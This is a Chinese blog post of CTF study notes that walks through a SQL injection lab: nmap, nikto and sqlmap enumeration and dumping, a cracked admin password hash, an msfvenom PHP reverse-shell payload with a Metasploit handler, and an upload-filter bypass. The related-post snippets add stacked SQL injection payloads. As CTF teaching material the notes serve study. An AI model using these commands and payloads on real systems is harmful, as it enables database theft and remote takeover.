我的CTF学习与教学之旅笔记5

最新推荐文章于 2024-06-06 21:04:25 发布
最新推荐文章于 2024-06-06 21:04:25 发布
阅读量210 收藏 1
点赞数 1
分类专栏: web安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lm19770429/article/details/105308022
版权

sql注入之get

SQL注入简介:

nmap -A -T4 -v -p- -oX 140.xml 10.10.10.140

nikto -host 10.10.10.151

手动构造sql注入语句,没有成功

接下来要用web应用安全漏洞扫描器:

owasp-zap扫描网站是否存在注入漏洞和XSS漏洞,发现相关URL

sqlmap -u "http://10.10.10.151/cat.php?id=3" --dbs
 

利用sqlmap -u url 等等进一步探测

如:sqlmap -u url --dbs 扫描所有数据库

sqlmap -u url -D "数据库名" --tables 查看数据库下的数据表 

sqlmap -u url -D “数据库”  -T “数据表” -C “属性列表(逗号隔开)” --dump      :获取指定数据

找到数据库密码后,可以尝试登陆后台管理系统,查找是否有upload文件漏洞

+-------+---------------------------------------------+
| login | password                                    |
+-------+---------------------------------------------+
| admin | 8efe310f9ab3efeae8d410a8e0166eb2 (P4ssw0rd) |
+-------+---------------------------------------------+
 

制作反射木马:msfvenom -p php/meterpreter/reverse_tcp lhost=IP lport=端口号 -f raw 

并启动msfconsole中的exploit/multi/handler

set payload php/meterpreter/reverse_tcp 

经验:如果不让直接上传php文件,可以尝试改为PHP后再上传

远程浏览刚上传的反射木马文件,启动meterpreter,开始进一步渗透

 

花纵酒
关注
专栏目录
CTF Web学习笔记
01-11
### CTF Web学习笔记知识点详解 #### 杂项部分 **1. 隐写术** 隐写术是一种将信息隐藏于其他非秘密数据之中的技术,这种技术通常用于隐蔽通信或数据保护。在CTF竞赛中,经常出现的情况是将flag隐藏在图像、音频...
CTF笔记.one
05-06
CTF笔记,注意是.one格式,里面详细记录了很多笔记,希望对各位学习有帮助!
CTF做题笔记5
Forever_Han13的博客
01-27 3375
xctf-supersqli: ?inject=-1';show databases;--+ ?inject=-1';show tables;--+ ?inject=-1';show columns from `1919810931114514`;--+ ?inject=-1';set @a= concat('sel','ect * from `1919810931114514`');prEpare stmt from @a;EXECUTE stmt;--+ xctf-NewsCenter: 1' uni
实验
weixin_30768661的博客
05-02 110
一、SQL注入 首先搭建虚拟机 用kali扫描下当前网段 发现一个192.168.1.134的可疑ip地址 使用nmap扫描端口 发现该ip开启了ftp和http两个服务 打开该虚拟机提供的网页 发现网站使用url传参 可能存在sql注入点 在id=1后加一个引号,网页报错 该网站存在sql注入漏洞 使用order by语句试出网站后台数据库表的列数 当order b...
【Vulnhub靶场】通过sql注入漏洞,文件上传漏洞拿下网站webshell
weixin_45619494的博客
10-12 742
00 页面没变化?发现上传的路径没法知道,用7kbscan扫描,发现http://192.168.93.132/admin/uploads,进入。点击test,发现多了个图片,上面url变成http://192.168.93.132/cat.php?返回首页,检查源代码,发现图片的变化是通过id的变化来改变的。
实验报告
weixin_30387423的博客
04-25 150
中国人民公安大学 Chinese people’public security university 网络对抗技术 实验报告 实验                    web攻击靶机解题过程 学生姓名 栗克宇 年级 15...
我的CTF学习教学之旅笔记14
lm19770429的专栏
04-10 358
命令注入: 查找一切可以浏览的页面,一定要浏览源码,可能发现密码 找到一个网站上的文件backup.zip,解压,密码可以参考刚浏览到的密码 一般解压出来的mp3文件不一定是mp3文件,用file 文件名,查看文件类型,一般是文本文件 cat 这个文件,了解详细内容 根据网站名称,searchsploit 查找相关漏洞说明 利用burpsuite:proxy、 repeater ...
我的CTF学习教学之旅笔记15
lm19770429的专栏
04-12 428
CTF综合测试:
我的CTF学习教学之旅笔记16
lm19770429的专栏
04-12 174
综合测试(高难度内核提权)
我的CTF学习教学之旅笔记2
lm19770429的专栏
04-07 182
2.ssh的root提权 nmap dirb 查看web应用目录,找到怪异文件,VDdasdsafqebferq12312423146509765.txt>id_rsa 通过网站联系方式,猜测用户名,登录 查看/etc/passwd /etc/crontab发现用户名,进行渗透 找到定时任务,进行代码反射-------难点:socket编程、 import pty git cl...
我的CTF学习教学之旅笔记11
lm19770429的专栏
04-08 396
路径遍历(提权root权限)web安全提权
基于Python的CTF学习材料设计源码仓库
最新发布
10-05
该项目是一个专注于CTF(Capture The Flag)学习材料的Python源码仓库,包含28个文件,其中22个为Python源代码文件,3个Markdown文档,1个PDF文件,1个Python编译文件和1个压缩文件。该仓库集合了丰富的CTF学习资源...
CTF从入门到提升教学视频
01-28
CTF能够锻炼选手对一些漏洞的理解能力,对安全研究、渗透测试也有一定的作用。越来越多的企业招聘安全从业人员时都会对CTF有一定的要求。
常用的一些安全相关网站汇总
lm19770429的专栏
04-15 2050
关于渗透测试: OWASP项目地址:https://owasp.org/projects/ owasp测试指南:https://owasp.org/www-project-web-security-testing-guide/ owasp开发指南:
关于利用hashcat破解WiFi数据包的操作记录
lm19770429的专栏
06-06 1381
hashcat
我的CTF学习教学之旅笔记4
lm19770429的专栏
04-07 756
经验: nmap -p- T4 IP 可以扫描到未知端口 nmap -A -vT IP 快速扫描
我的CTF学习教学之旅笔记9,附有常见字符的Url编码列表
lm19770429的专栏
04-07 688
目录遍历(拿到www-data用户权限)
关于常见的字符编码汇总
lm19770429的专栏
03-13 513
HTML URL 字符编码 URL 编码会将字符转换为可通过因特网传输的格式。 URL 编码 URL 只能使用ASCII码来通过因特网进行发送。 由于 URL 常常会包含 ASCII 集合之外的字符,URL 必须转换为有效的 ASCII 格式。 URL 编码使用 "%" 其后跟随两位的十六进制数来替换非 ASCII 字符。 URL 不能包含空格。URL 编码通常使用 + 来替换空格。 如需完整的 URL 编码参考,https://www.w3school.com.cn/tags/html.
应急响应与WEB安全CTF学习大纲
"CTF-web学习大纲,应急响应之WEB,VSRC应急响应中心,基础概念,注意事项,事件了解,WEB攻击溯源" CTF(Capture The Flag)是一种网络安全竞赛,通常涉及攻防演练,其中“WEB”部分主要关注Web应用程序的安全性。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值